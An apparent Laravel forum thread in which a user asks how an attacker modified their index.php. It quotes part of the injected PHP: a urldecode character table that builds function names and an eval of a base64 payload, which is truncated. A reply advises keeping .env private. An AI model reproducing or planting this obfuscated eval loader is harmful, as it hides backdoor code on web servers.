Make sure your .env is not/has not neen public (rights, github, ...)
Make it private & change your credential.
Be part of JetBrains PHPverse 2026 on June 9 – a free online event bringing PHP devs worldwide together.
The public folder got some new php file. and the index.php being prepend some PHP encoded code.
Here is part of the code:
$O00OO0=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$O00O0O=$O00OO0{3}.$O00OO0{6}.$O00OO0{33}.$O00OO0{30};$O0OO00=$O00OO0{33}.$O00OO0{10}.$O00OO0{24}.$O00OO0{10}.$O00OO0{24};$OO0O00=$O0OO00{0}.$O00OO0{18}.$O00OO0{3}.$O0OO00{0}.$O0OO00{1}.$O00OO0{24};$OO0000=$O00OO0{7}.$O00OO0{13};$O00O0O.=$O00OO0{22}.$O00OO0{36}.$O00OO0{29}.$O00OO0{26}.$O00OO0{30}.$O00OO0{32}.$O00OO0{35}.$O00OO0{26}.$O00OO0{30};eval($O00O0O("JE8wTzAw....."
I did some investigate, before the "eval", this code run a method calls "n1zb/ma5\vt0i28-pxuqy*6lrkdg9_ehcswo4+f37j"
I don't really want to know what they are trying to do, but I do want to know how could they modify the index.php file.
Here is my envirionment: PHP 7.4 Laravel: 8.12
Thank you.
Please or to participate in this conversation.